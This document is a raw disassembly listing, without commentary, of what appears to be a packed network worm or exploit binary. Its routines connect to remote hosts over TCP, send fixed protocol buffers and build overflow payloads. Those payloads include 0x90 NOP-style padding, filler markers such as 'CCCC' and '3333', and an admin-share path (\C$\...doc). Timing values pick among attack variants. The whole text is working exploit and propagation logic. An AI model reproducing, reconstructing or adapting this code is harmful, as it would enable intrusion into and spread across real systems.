loc_405D31: ; CODE XREF: sub_405CEC+3C�j
call sub_40899B
loc_405D36: ; CODE XREF: sub_405CEC+43�j
cmp byte_40B240, bl
jnz short loc_405D67
cmp byte_40B274, bl
jz short loc_405D67
mov eax, dword_40372C
imul eax, 1Ch
push off_401BA8[eax]
push off_401BA4[eax]
push offset dword_40195C
call sub_405185
add esp, 0Ch
loc_405D67: ; CODE XREF: sub_405CEC+50�j
; sub_405CEC+58�j
call sub_40AAA5
test al, al
jz short loc_405D78
push 1
call dword_4010F0 ; ExitProcess
loc_405D78: ; CODE XREF: sub_405CEC+82�j
push esi
call sub_40A64F
pop ecx
test eax, eax
jnz short loc_405D94
push esi
push 1
push ebx
push offset sub_4098E2
call sub_40A45C
add esp, 10h
loc_405D94: ; CODE XREF: sub_405CEC+95�j
push 4650h
call dword_4010F4 ; Sleep
jmp loc_405D1B
sub_405CEC endp
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
or dword ptr [ebp-4], 0FFFFFFFFh
push 0
call dword_4010EC ; ExitThread
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405DB7 proc near ; DATA XREF: MEW:off_402BE4�o
var_1B7C = byte ptr -1B7Ch
var_1A18 = byte ptr -1A18h
var_B7C = byte ptr -0B7Ch
var_A18 = byte ptr -0A18h
var_97C = byte ptr -97Ch
var_974 = dword ptr -974h
var_96C = dword ptr -96Ch
var_964 = byte ptr -964h
var_920 = byte ptr -920h
var_900 = byte ptr -900h
var_8FC = byte ptr -8FCh
var_8F8 = byte ptr -8F8h
var_8F4 = byte ptr -8F4h
var_8F0 = byte ptr -8F0h
var_898 = byte ptr -898h
var_892 = byte ptr -892h
var_88A = byte ptr -88Ah
var_886 = byte ptr -886h
var_882 = byte ptr -882h
var_87C = byte ptr -87Ch
var_818 = byte ptr -818h
var_810 = dword ptr -810h
var_808 = dword ptr -808h
var_798 = dword ptr -798h
var_794 = dword ptr -794h
var_764 = dword ptr -764h
var_760 = dword ptr -760h
var_748 = dword ptr -748h
var_68C = dword ptr -68Ch
var_4B8 = dword ptr -4B8h
var_4B0 = dword ptr -4B0h
var_4A8 = byte ptr -4A8h
var_484 = byte ptr -484h
var_478 = byte ptr -478h
var_17C = byte ptr -17Ch
var_90 = byte ptr -90h
var_86 = byte ptr -86h
var_82 = byte ptr -82h
var_4A = byte ptr -4Ah
var_46 = byte ptr -46h
var_42 = byte ptr -42h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1A18h
call sub_40ABE0
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
push 2
push dword ptr [edi+8]
call sub_4096C8
xor esi, esi
pop ecx
cmp eax, esi
pop ecx
mov [ebp+var_8], eax
jz loc_40609D
cmp eax, 1
jz loc_40609D
mov eax, [edi+4]
push 7
imul eax, 2Ch
push offset dword_402260
push dword_402BEC[eax]
mov ax, word_40B24A
push eax
lea eax, [ebp+var_A18]
push dword_40B244
push 200h
push eax
call sub_407617
add esp, 1Ch
cmp eax, esi
mov [ebp+var_4], eax
push esi
jnz short loc_405E2E
call dword_4010EC ; ExitThread
loc_405E2E: ; CODE XREF: sub_405DB7+6F�j
push esi
push esi
push 6
push 1
push 2
call dword_401200
mov [ebp+arg_0], eax
push 10h
lea eax, [ebp+var_18]
push esi
push eax
call sub_40AC10
mov ax, [edi]
add esp, 0Ch
mov [ebp+var_18], 2
push eax
call dword_401230
mov [ebp+var_16], ax
mov eax, [edi+8]
mov [ebp+var_14], eax
lea eax, [ebp+var_18]
push 10h
push eax
push [ebp+arg_0]
call dword_401238
cmp eax, 0FFFFFFFFh
push esi
jnz short loc_405E83
call dword_4010EC ; ExitThread
loc_405E83: ; CODE XREF: sub_405DB7+C4�j
mov ebx, dword_401244
push 48h
push offset dword_401DE0
push [ebp+arg_0]
call ebx ; dword_401244
cmp eax, 0FFFFFFFFh
push esi
jnz short loc_405EA1
call dword_4010EC ; ExitThread
loc_405EA1: ; CODE XREF: sub_405DB7+E2�j
lea eax, [ebp+var_1A18]
push 1000h
push eax
push [ebp+arg_0]
call dword_40123C
cmp eax, 0FFFFFFFFh
jnz short loc_405EC2
push esi
call dword_4010EC ; ExitThread
loc_405EC2: ; CODE XREF: sub_405DB7+102�j
mov eax, [ebp+var_4]
push 10h
add eax, 0D7h
pop ecx
cdq
idiv ecx
push 0Ch
mov edi, 0B3h
pop eax
sub eax, edx
jns short loc_405EDF
add edi, 10h
loc_405EDF: ; CODE XREF: sub_405DB7+123�j
push 360h
lea eax, [ebp+var_818]
push offset dword_401E60
push eax
sub edi, edx
call sub_40AC2E
push 10h
lea eax, [ebp+var_4B8]
push offset dword_4021C4
push eax
call sub_40AC2E
push 30h
lea eax, [ebp+var_4A8]
push offset aFxnbfxfxnbfxfx ; "FXNBFXFXNBFXFXFXFX"
push eax
call sub_40AC2E
push edi
lea eax, [ebp+var_478]
push 90h
push eax
call sub_40AC10
push [ebp+var_4]
lea esi, [edi+3A0h]
lea eax, [ebp+var_A18]
push eax
lea eax, [ebp+esi+var_818]
push eax
call sub_40AC2E
add esi, [ebp+var_4]
push 3Ch
push offset aC1234561111111 ; "\\C$\\123456111111111111111.doc"
lea eax, [ebp+esi+var_818]
push eax
call sub_40AC2E
add esp, 48h
add esi, 3Ch
push 30h
lea eax, [ebp+esi+var_818]
push offset dword_402218
push eax
call sub_40AC2E
mov eax, [ebp+var_8]
add esp, 0Ch
add esi, 30h
dec eax
jz short loc_405FA1
dec eax
jz short loc_405F98
dec eax
push 4
jnz short loc_405F9A
push offset dword_402254
jmp short loc_405FA8
; ---------------------------------------------------------------------------
loc_405F98: ; CODE XREF: sub_405DB7+1D3�j
push 4
loc_405F9A: ; CODE XREF: sub_405DB7+1D8�j
push offset dword_402250
jmp short loc_405FA8
; ---------------------------------------------------------------------------
loc_405FA1: ; CODE XREF: sub_405DB7+1D0�j
push 4
push offset dword_40224C
loc_405FA8: ; CODE XREF: sub_405DB7+1DF�j
; sub_405DB7+1E8�j
lea eax, [ebp+var_484]
push eax
call sub_40AC2E
mov eax, [ebp+var_4]
mov ecx, [ebp+var_810]
add esp, 0Ch
lea eax, [edi+eax+30h]
xor edi, edi
push edi
push esi
lea ecx, [ecx+eax-0Ch]
mov [ebp+var_810], ecx
mov ecx, [ebp+var_808]
lea ecx, [ecx+eax-0Ch]
mov [ebp+var_808], ecx
mov ecx, [ebp+var_798]
lea ecx, [ecx+eax-0Ch]
mov [ebp+var_798], ecx
mov ecx, [ebp+var_794]
lea ecx, [ecx+eax-0Ch]
mov [ebp+var_794], ecx
mov ecx, [ebp+var_764]
lea ecx, [ecx+eax-0Ch]
mov [ebp+var_764], ecx
mov ecx, [ebp+var_760]
lea ecx, [ecx+eax-0Ch]
mov [ebp+var_760], ecx
mov ecx, [ebp+var_748]
lea ecx, [ecx+eax-0Ch]
mov [ebp+var_748], ecx
mov ecx, [ebp+var_68C]
lea ecx, [ecx+eax-0Ch]
cdq
sub eax, edx
mov [ebp+var_68C], ecx
sar eax, 1
add [ebp+var_4B8], eax
add [ebp+var_4B0], eax
lea eax, [ebp+var_818]
push eax
push [ebp+arg_0]
call ebx ; dword_401244
cmp eax, 0FFFFFFFFh
push edi
jnz short loc_40606B
call dword_4010EC ; ExitThread
loc_40606B: ; CODE XREF: sub_405DB7+2AC�j
lea eax, [ebp+var_1A18]
push 1000h
push eax
push [ebp+arg_0]
call dword_40123C
cmp eax, 0FFFFFFFFh
jnz short loc_40608C
push edi
call dword_4010EC ; ExitThread
loc_40608C: ; CODE XREF: sub_405DB7+2CC�j
push [ebp+arg_0]
call sub_408616
pop ecx
push 1
call dword_4010EC ; ExitThread
loc_40609D: ; CODE XREF: sub_405DB7+26�j
; sub_405DB7+2F�j
push esi
call dword_4010EC ; ExitThread
push ebp
mov ebp, esp
mov eax, 1B7Ch
call sub_40ABE0
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
push 7
push offset dword_402260
mov eax, [edi+4]
imul eax, 2Ch
push dword_402BEC[eax]
mov ax, word_40B24A
push eax
lea eax, [ebp+var_B7C]
push dword_40B244
push 200h
push eax
call sub_407617
xor ebx, ebx
add esp, 1Ch
cmp eax, ebx
mov [ebp+var_4], eax
jnz short loc_4060FB
push ebx
call dword_4010EC ; ExitThread
loc_4060FB: ; CODE XREF: sub_405DB7+33B�j
push 10h
lea eax, [ebp+var_14]
push ebx
push eax
call sub_40AC10
mov eax, [edi+8]
add esp, 0Ch
mov [ebp+var_10], eax
mov ax, [edi]
push 2
pop esi
push eax
mov word ptr [ebp+var_14], si
call dword_401230
push ebx
push ebx
push ebx
push 6
push 1
push esi
mov word ptr [ebp+var_14+2], ax
call dword_401200
mov edi, eax
lea eax, [ebp+var_14]
push 10h
push eax
push edi
mov [ebp+arg_0], edi
call dword_401238
cmp eax, 0FFFFFFFFh
push ebx
jnz short loc_406151
call dword_4010EC ; ExitThread
loc_406151: ; CODE XREF: sub_405DB7+392�j
push 48h
push offset dword_402268
push edi
call dword_401244
cmp eax, 0FFFFFFFFh
push ebx
jnz short loc_40616B
call dword_4010EC ; ExitThread
loc_40616B: ; CODE XREF: sub_405DB7+3AC�j
lea eax, [ebp+var_1B7C]
push 1000h
push eax
push edi
call dword_40123C
cmp eax, 0FFFFFFFFh
jnz short loc_40618A
push ebx
call dword_4010EC ; ExitThread
loc_40618A: ; CODE XREF: sub_405DB7+3CA�j
mov edi, 168h
loc_40618F: ; CODE XREF: sub_405DB7+3ED�j
push 7Ah
push 61h
call sub_40A818
mov [ebp+ebx+var_17C], al
inc ebx
pop ecx
cmp ebx, edi
pop ecx
jl short loc_40618F
push 0Ah
lea eax, [ebp+var_90]
push offset loc_402358
push eax
call sub_40AC2E
push esi
lea eax, [ebp+var_86]
push offset loc_4023A8
push eax
call sub_40AC2E
push 4
lea eax, [ebp+var_82]
pop ebx
push ebx
push offset loc_4023A0
push eax
call sub_40AC2E
push esi
lea eax, [ebp+var_4A]
push offset loc_4023A4
push eax
call sub_40AC2E
push ebx
lea eax, [ebp+var_46]
push (offset loc_40239B+1)
push eax
call sub_40AC2E
push 0Bh
lea eax, [ebp+var_42]
push offset loc_40234C
push eax
call sub_40AC2E
add esp, 48h
lea eax, [ebp+var_97C]
push 18h
push offset dword_4022B4
push eax
call sub_40AC2E
push 44h
lea eax, [ebp+var_964]
push offset dword_4022D0
push eax
call sub_40AC2E
mov esi, 90h
push 20h
lea eax, [ebp+var_920]
push esi
push eax
call sub_40AC10
push ebx
lea eax, [ebp+var_900]
push offset loc_402364
push eax
call sub_40AC2E
push ebx
lea eax, [ebp+var_8FC]
push offset loc_402398
push eax
call sub_40AC2E
push ebx
lea eax, [ebp+var_8F8]
push offset dword_402390
push eax
call sub_40AC2E
add esp, 48h
lea eax, [ebp+var_8F4]
push ebx
push offset loc_402394
push eax
call sub_40AC2E
push 58h
lea eax, [ebp+var_8F0]
push esi
push eax
call sub_40AC10
push 6
lea eax, [ebp+var_898]
push offset loc_40236C
push eax
call sub_40AC2E
push 8
lea eax, [ebp+var_892]
push esi
push eax
call sub_40AC10
push ebx
lea eax, [ebp+var_88A]
push offset loc_402374
push eax
call sub_40AC2E
push ebx
lea eax, [ebp+var_886]
push esi
push eax
call sub_40AC10
add esp, 48h
lea eax, [ebp+var_882]
push 6
push offset loc_40237C
push eax
call sub_40AC2E
mov ebx, [ebp+var_4]
mov eax, 3E6h
sub eax, ebx
push eax
lea eax, [ebp+var_87C]
push esi
push eax
call sub_40AC10
mov esi, 4E6h
lea eax, [ebp+var_B7C]
sub esi, ebx
push ebx
push eax
lea eax, [ebp+esi+var_97C]
push eax
call sub_40AC2E
add esi, ebx
lea eax, [ebp+var_17C]
push edi
push eax
lea eax, [ebp+esi+var_97C]
push eax
call sub_40AC2E
add esi, edi
push 0Ah
push offset off_402384
lea eax, [ebp+esi+var_97C]
push eax
call sub_40AC2E
add esi, 0Ah
push 32h
push offset dword_402318
lea eax, [ebp+esi+var_97C]
push eax
call sub_40AC2E
add esi, 32h
add esp, 48h
xor edi, edi
mov [ebp+var_974], esi
lea eax, [esi-18h]
push edi
mov [ebp+var_96C], eax
lea eax, [ebp+var_97C]
push esi
push eax
push [ebp+arg_0]
call dword_401244
cmp eax, 0FFFFFFFFh
push edi
jnz short loc_4063AA
call dword_4010EC ; ExitThread
loc_4063AA: ; CODE XREF: sub_405DB7+5EB�j
lea eax, [ebp+var_1B7C]
push 1000h
push eax
push [ebp+arg_0]
call dword_40123C
cmp eax, 0FFFFFFFFh
jnz short loc_4063CB
push edi
call dword_4010EC ; ExitThread
loc_4063CB: ; CODE XREF: sub_405DB7+60B�j
push [ebp+arg_0]
call sub_408616
pop ecx
push 1
call dword_4010EC ; ExitThread
sub_405DB7 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4063DC proc near ; CODE XREF: MEW:00406974�p
; MEW:004069A6�p ...
var_8BB0 = byte ptr -8BB0h
var_8B48 = byte ptr -8B48h
var_6AD8 = byte ptr -6AD8h
var_6A68 = byte ptr -6A68h
var_5FA4 = byte ptr -5FA4h
var_4A00 = byte ptr -4A00h
var_49FF = byte ptr -49FFh
var_3974 = byte ptr -3974h
var_2EA8 = byte ptr -2EA8h
var_2EA7 = byte ptr -2EA7h
var_2EA4 = byte ptr -2EA4h
var_26C0 = byte ptr -26C0h
var_26B0 = byte ptr -26B0h
var_238C = byte ptr -238Ch
var_2388 = byte ptr -2388h
var_237C = byte ptr -237Ch
var_20F4 = byte ptr -20F4h
var_2078 = byte ptr -2078h
var_18A8 = byte ptr -18A8h
var_13FD = byte ptr -13FDh
var_1110 = byte ptr -1110h
var_1070 = byte ptr -1070h
var_964 = dword ptr -964h
var_954 = byte ptr -954h
var_940 = byte ptr -940h
var_300 = byte ptr -300h
var_100 = byte ptr -100h
var_FF = byte ptr -0FFh
var_B0 = byte ptr -0B0h
var_AD = byte ptr -0ADh
var_83 = byte ptr -83h
var_81 = byte ptr -81h
var_80 = byte ptr -80h
var_38 = byte ptr -38h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, 8BB0h
call sub_40ABE0
mov eax, dword_4029D4
push ebx
push esi
push edi
mov [ebp+var_10], eax
mov eax, dword_4029D8
push 7
push offset dword_402260
push [ebp+arg_0]
mov [ebp+var_C], eax
mov ax, word_40B24A
push eax
lea eax, [ebp+var_300]
push dword_40B244
push 200h
push eax
call sub_407617
add esp, 1Ch
mov [ebp+var_8], eax
test eax, eax
jz loc_40681D
push [ebp+arg_C]
lea eax, [ebp+var_38]
push offset loc_4029C8
push eax
call sub_40AB94
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp+var_FF]
loc_40644E: ; CODE XREF: sub_4063DC+82�j
mov dl, [ebp+ecx+var_38]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_40644E
push 60h
lea eax, [ebp+var_B0]
push offset dword_4025C4
push eax
call sub_40AC2E
lea eax, [ebp+var_38]
push eax
call sub_40ABD2
shl eax, 1
push eax
lea eax, [ebp+var_100]
push eax
lea eax, [ebp+var_80]
push eax
call sub_40AC2E
add esp, 1Ch
lea eax, [ebp+var_38]
push 9
push (offset aC+3)
push eax
call sub_40ABD2
pop ecx
lea eax, [ebp+eax*2+var_81]
push eax
call sub_40AC2E
lea eax, [ebp+var_38]
push eax
call sub_40ABD2
add al, 1Ah
push 1
shl al, 1
mov byte ptr [ebp+arg_0+3], al
lea eax, [ebp+arg_0+3]
push eax
lea eax, [ebp+var_AD]
push eax
call sub_40AC2E
lea eax, [ebp+var_38]
push eax
call sub_40ABD2
shl al, 1
add al, 9
push 1
mov [ebp+var_1], al
lea eax, [ebp+var_1]
push eax
lea eax, [ebp+var_83]
push eax
call sub_40AC2E
mov edi, [ebp+arg_8]
add esp, 2Ch
test edi, edi
push 4
pop ebx
jz loc_4065D2
mov esi, 0DACh
lea eax, [ebp+var_2EA4]
push esi
push 90h
push eax
call sub_40AC10
lea edi, ds:4029B4h[edi*4]
push ebx
lea eax, [ebp+var_26C0]
push edi
push eax
call sub_40AC2E
push [ebp+var_8]
lea eax, [ebp+var_300]
push eax
lea eax, [ebp+var_26B0]
push eax
call sub_40AC2E
push ebx
lea eax, [ebp+var_238C]
push offset loc_4029C0
push eax
call sub_40AC2E
push ebx
lea eax, [ebp+var_2388]
push edi
push eax
call sub_40AC2E
push [ebp+var_8]
lea eax, [ebp+var_300]
push eax
lea eax, [ebp+var_237C]
push eax
call sub_40AC2E
add esp, 48h
xor ecx, ecx
lea eax, [ebp+var_49FF]
loc_406588: ; CODE XREF: sub_4063DC+1BE�j
mov dl, [ebp+ecx+var_2EA4]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, esi
jl short loc_406588
and [ebp+var_2EA8], 0
and [ebp+var_2EA7], 0
mov esi, 1C52h
lea eax, [ebp+var_8BB0]
push esi
push 31h
push eax
call sub_40AC10
push esi
lea eax, [ebp+var_6AD8]
push 31h
push eax
call sub_40AC10
add esp, 18h
jmp short loc_406626
; ---------------------------------------------------------------------------
loc_4065D2: ; CODE XREF: sub_4063DC+123�j
push 7D0h
lea eax, [ebp+var_1110]
push 90h
push eax
call sub_40AC10
push [ebp+var_8]
lea eax, [ebp+var_300]
push eax
lea eax, [ebp+var_1070]
push eax
call sub_40AC2E
lea eax, [ebp+var_10]
push eax
call sub_40ABD2
push eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_954]
push eax
call sub_40AC2E
mov eax, dword_4029B4
add esp, 28h
mov [ebp+var_964], eax
loc_406626: ; CODE XREF: sub_4063DC+1F4�j
push 0E29h
lea eax, [ebp+var_20F4]
push 31h
push eax
call sub_40AC10
movsx eax, byte ptr [ebp+arg_0+3]
add esp, 0Ch
add eax, ebx
mov esi, dword_401244
push 0
push eax
lea eax, [ebp+var_B0]
push eax
push [ebp+arg_4]
call esi ; dword_401244
cmp eax, 0FFFFFFFFh
jz loc_40681D
mov edi, dword_40123C
mov ebx, 640h
push 0
lea eax, [ebp+var_940]
push ebx
push eax
push [ebp+arg_4]
call edi ; dword_40123C
cmp eax, 0FFFFFFFFh
jz loc_40681D
push 0
push 68h
push offset dword_402628
push [ebp+arg_4]
call esi ; dword_401244
cmp eax, 0FFFFFFFFh
jz loc_40681D
push 0
lea eax, [ebp+var_940]
push ebx
push eax
push [ebp+arg_4]
call edi ; dword_40123C
cmp eax, 0FFFFFFFFh
jz loc_40681D
push 0
push 0A0h
push offset dword_402694
push [ebp+arg_4]
call esi ; dword_401244
cmp eax, 0FFFFFFFFh
jz loc_40681D
push 0
lea eax, [ebp+var_940]
push ebx
push eax
push [ebp+arg_4]
call edi ; dword_40123C
cmp eax, 0FFFFFFFFh
jz loc_40681D
cmp [ebp+arg_8], 0
jz loc_4067A6
push 68h
lea eax, [ebp+var_8BB0]
push offset dword_40284C
push eax
call sub_40AC2E
lea eax, [ebp+var_4A00]
push 1B5Ah
push eax
lea eax, [ebp+var_8B48]
push eax
call sub_40AC2E
push 70h
lea eax, [ebp+var_6AD8]
push offset dword_4028B8
push eax
call sub_40AC2E
lea eax, [ebp+var_3974]
push 0A5Eh
push eax
lea eax, [ebp+var_6A68]
push eax
call sub_40AC2E
push 84h
lea eax, [ebp+var_5FA4]
push offset dword_40292C
push eax
call sub_40AC2E
add esp, 3Ch
lea eax, [ebp+var_8BB0]
push 0
push 10FCh
push eax
push [ebp+arg_4]
call esi ; dword_401244
cmp eax, 0FFFFFFFFh
jz loc_40681D
push 0
lea eax, [ebp+var_940]
push ebx
push eax
push [ebp+arg_4]
call edi ; dword_40123C
cmp eax, 0FFFFFFFFh
jz loc_40681D
push 0
lea eax, [ebp+var_6AD8]
push 0FDCh
push eax
push [ebp+arg_4]
call esi ; dword_401244
jmp short loc_406818
; ---------------------------------------------------------------------------
loc_4067A6: ; CODE XREF: sub_4063DC+30C�j
push 7Ch
lea eax, [ebp+var_20F4]
push offset dword_402738
push eax
call sub_40AC2E
lea eax, [ebp+var_1110]
push 7D0h
push eax
lea eax, [ebp+var_2078]
push eax
call sub_40AC2E
push 90h
lea eax, [ebp+var_18A8]
push offset off_4027B8
push eax
call sub_40AC2E
add esp, 24h
and [ebp+var_13FD], 0
lea eax, [ebp+var_20F4]
push 0
push 0CF7h
push eax
push [ebp+arg_4]
call esi ; dword_401244
cmp eax, 0FFFFFFFFh
jz short loc_40681D
push 0
lea eax, [ebp+var_940]
push ebx
push eax
push [ebp+arg_4]
call edi ; dword_40123C
loc_406818: ; CODE XREF: sub_4063DC+3C8�j
cmp eax, 0FFFFFFFFh
jnz short loc_406821
loc_40681D: ; CODE XREF: sub_4063DC+50�j
; sub_4063DC+27E�j ...
xor al, al
jmp short loc_406823
; ---------------------------------------------------------------------------
loc_406821: ; CODE XREF: sub_4063DC+43F�j
mov al, 1
loc_406823: ; CODE XREF: sub_4063DC+443�j
pop edi
pop esi
pop ebx
leave
retn
sub_4063DC endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 650h
push ebx
push esi
push edi
xor edi, edi
push 10h
lea eax, [ebp-10h]
push edi
push eax
call sub_40AC10
mov esi, [ebp+8]
add esp, 0Ch
mov word ptr [ebp-10h], 2
mov eax, [esi+8]
mov [ebp-0Ch], eax
mov ax, [esi]
push eax
call dword_401230
push edi
push edi
push edi
push 6
push 1
push 2
mov [ebp-0Eh], ax
call dword_401200
mov ebx, eax
lea eax, [ebp-10h]
push 10h
push eax
push ebx
call dword_401238
cmp eax, 0FFFFFFFFh
push edi
jnz short loc_40688C
call dword_4010EC ; ExitThread
loc_40688C: ; CODE XREF: MEW:00406884�j
push 89h
push offset dword_4023AC
push ebx
call dword_401244
cmp eax, 0FFFFFFFFh
push edi
jnz short loc_4068A9
call dword_4010EC ; ExitThread
loc_4068A9: ; CODE XREF: MEW:004068A1�j
lea eax, [ebp-650h]
push 640h
push eax
push ebx
call dword_40123C
cmp eax, 0FFFFFFFFh
push edi
jnz short loc_4068C8
call dword_4010EC ; ExitThread
loc_4068C8: ; CODE XREF: MEW:004068C0�j
push 0A8h
push offset dword_402438
push ebx
call dword_401244
cmp eax, 0FFFFFFFFh
push edi
jnz short loc_4068E5
call dword_4010EC ; ExitThread
loc_4068E5: ; CODE XREF: MEW:004068DD�j
lea eax, [ebp-650h]
push 640h
push eax
push ebx
call dword_40123C
cmp eax, 0FFFFFFFFh
push edi
jnz short loc_406904
call dword_4010EC ; ExitThread
loc_406904: ; CODE XREF: MEW:004068FC�j
push 0DEh
push offset dword_4024E4
push ebx
call dword_401244
cmp eax, 0FFFFFFFFh
push edi
jnz short loc_406921
call dword_4010EC ; ExitThread
loc_406921: ; CODE XREF: MEW:00406919�j
lea eax, [ebp-650h]
push 640h
push eax
push ebx
call dword_40123C
cmp eax, 0FFFFFFFFh
jnz short loc_406940
push edi
call dword_4010EC ; ExitThread
loc_406940: ; CODE XREF: MEW:00406937�j
movsx eax, byte ptr [ebp-60Ch]
sub eax, 30h
jz short loc_4069C0
push dword ptr [esi+8]
dec eax
jz short loc_406992
call sub_40715A
pop ecx
push eax
call dword_4010FC ; GetTickCount
push 3
xor edx, edx
pop ecx
div ecx
mov eax, [esi+4]
imul eax, 2Ch
push edx
push ebx
push dword_402BEC[eax]
call sub_4063DC
add esp, 10h
test al, al
jz loc_406A16
push ebx
call sub_408616
pop ecx
push edi
call dword_4010EC ; ExitThread
loc_406992: ; CODE XREF: MEW:00406950�j
call sub_40715A
push eax
mov eax, [esi+4]
imul eax, 2Ch
push edi
push ebx
push dword_402BEC[eax]
call sub_4063DC
add esp, 14h
test al, al
jz short loc_406A16
push ebx
call sub_408616
pop ecx
push edi
call dword_4010EC ; ExitThread
loc_4069C0: ; CODE XREF: MEW:0040694A�j
push dword ptr [esi+8]
call sub_40715A
push eax
mov eax, [esi+4]
imul eax, 2Ch
push 2
push ebx
push dword_402BEC[eax]
call sub_4063DC
add esp, 14h
test al, al
jnz short loc_406A25
push dword ptr [esi+8]
call sub_40715A
push eax
mov eax, [esi+4]
imul eax, 2Ch
push 1
push ebx
push dword_402BEC[eax]
call sub_4063DC
add esp, 14h
test al, al
jz short loc_406A16
push ebx
call sub_408616
pop ecx
push edi
call dword_4010EC ; ExitThread
loc_406A16: ; CODE XREF: MEW:0040697E�j
; MEW:004069B0�j ...
push ebx
call sub_408616
pop ecx
push 1
call dword_4010EC ; ExitThread
loc_406A25: ; CODE XREF: MEW:004069E2�j
push ebx
call sub_408616
pop ecx
push edi
call dword_4010EC ; ExitThread
push ebp
mov ebp, esp
sub esp, 0A14h
push esi
mov esi, [ebp+8]
push edi
push 2
mov eax, [esi+4]
push offset asc_402AAC ; "\r"
imul eax, 2Ch
push dword_402BEC[eax]
mov ax, word_40B24A
push eax
lea eax, [ebp-0A14h]
push dword_40B244
push 200h
push eax
call sub_407617
xor edi, edi
add esp, 1Ch
cmp eax, edi
mov [ebp-4], eax
jnz short loc_406A85
push edi
call dword_4010EC ; ExitThread
loc_406A85: ; CODE XREF: MEW:00406A7C�j
push 10h
lea eax, [ebp-14h]
push edi
push eax
call sub_40AC10
mov ax, [esi]
add esp, 0Ch
mov word ptr [ebp-14h], 2
push eax
call dword_401230
push edi
push edi
push edi
mov [ebp-12h], ax
mov eax, [esi+8]
push 6
push 1
push 2
mov [ebp-10h], eax
call dword_401200
lea ecx, [ebp-14h]
push 10h
push ecx
push eax
mov [ebp+8], eax
call dword_401238
cmp eax, 0FFFFFFFFh
jnz short loc_406AD9
push edi
call dword_4010EC ; ExitThread
loc_406AD9: ; CODE XREF: MEW:00406AD0�j
push ebx
mov ebx, 90h
push 800h
lea eax, [ebp-814h]
push ebx
push eax
call sub_40AC10
push 24h
lea eax, [ebp-814h]
push offset dword_4029DC
push eax
call sub_40AC2E
push 210h
lea eax, [ebp-7F0h]
push 4Dh
push eax
call sub_40AC10
push 4
lea eax, [ebp-5E0h]
pop edi
push edi
push offset aEu4 ; "\x1B4"
push eax
call sub_40AC2E
push edi
lea eax, [ebp-5DCh]
push offset aCccc ; "CCCC"
push eax
call sub_40AC2E
push edi
lea eax, [ebp-5D8h]
push offset loc_402A04
push eax
call sub_40AC2E
add esp, 48h
mov esi, (offset loc_402A04+4)
lea eax, [ebp-5D4h]
push edi
push esi
push eax
call sub_40AC2E
push edi
lea eax, [ebp-5D0h]
push esi
push eax
call sub_40AC2E
push edi
lea eax, [ebp-5CCh]
push offset a3333 ; "3333"
push eax
call sub_40AC2E
push edi
lea eax, [ebp-5C8h]
push esi
push eax
call sub_40AC2E
push edi
lea eax, [ebp-5C4h]
push esi
push eax
call sub_40AC2E
push 58h
lea eax, [ebp-5C0h]
push 41h
push eax
call sub_40AC10
mov edi, [ebp-4]
mov eax, 200h
add esp, 48h
sub eax, edi
push eax
lea eax, [ebp-568h]
push ebx
push eax
call sub_40AC10
mov esi, 4ACh
lea eax, [ebp-0A14h]
sub esi, edi
push edi
push eax
lea eax, [ebp+esi-814h]
push eax
call sub_40AC2E
add esi, edi
push 5
push offset dword_402A8C
lea eax, [ebp+esi-814h]
push eax
call sub_40AC2E
add esp, 24h
add esi, 5
lea eax, [ebp-814h]
push 0
push esi
push eax
push dword ptr [ebp+8]
call dword_401244
cmp eax, 0FFFFFFFFh
pop ebx
jnz short loc_406C26
push 0
call dword_4010EC ; ExitThread
loc_406C26: ; CODE XREF: MEW:00406C1C�j
push dword ptr [ebp+8]
call sub_408616
pop ecx
push 1
call dword_4010EC ; ExitThread
push ebp
mov ebp, esp
sub esp, 610h
push ebx
push esi
mov esi, [ebp+8]
push edi
push 6
push offset aR_0 ; "/\\r\n:"
mov eax, [esi+4]
imul eax, 2Ch
push dword_402BEC[eax]
mov ax, word_40B24A
push eax
lea eax, [ebp-610h]
push dword_40B244
push 200h
push eax
call sub_407617
mov edi, eax
xor ebx, ebx
add esp, 1Ch
cmp edi, ebx
jnz short loc_406C89
push ebx
call dword_4010EC ; ExitThread
loc_406C89: ; CODE XREF: MEW:00406C80�j
push 10h
lea eax, [ebp-10h]
push ebx
push eax
call sub_40AC10
add esp, 0Ch
mov word ptr [ebp-10h], 2
push 59Ah
call dword_401230
mov [ebp-0Eh], ax
mov eax, [esi+8]
push ebx
push 2
push 2
mov [ebp-0Ch], eax
call dword_401234
lea ecx, [ebp-10h]
push 10h
push ecx
push eax
mov [ebp+8], eax
call dword_401238
cmp eax, 0FFFFFFFFh
jnz short loc_406CDA
push ebx
call dword_4010EC ; ExitThread
loc_406CDA: ; CODE XREF: MEW:00406CD1�j
push 320h
lea eax, [ebp-410h]
push 90h
push eax
call sub_40AC10
push 1
push 4
pop ebx
lea eax, [ebp-410h]
push ebx
push eax
call sub_40AC10
push 6
lea eax, [ebp-2F0h]
push offset aH888r ; "h:888"
push eax
call sub_40AC2E
push ebx
lea eax, [ebp-3AFh]
push (offset loc_402A0A+2)
push eax
call sub_40AC2E
push ebx
lea eax, [ebp-3ABh]
push offset aIiii ; "ii"
push eax
call sub_40AC2E
mov esi, (offset loc_402A0D+3)
push ebx
lea eax, [ebp-3A3h]
push esi
push eax
call sub_40AC2E
add esp, 48h
lea eax, [ebp-39Fh]
push ebx
push esi
push eax
call sub_40AC2E
push 3
lea eax, [ebp-337h]
push offset a512 ; "512"
push eax
call sub_40AC2E
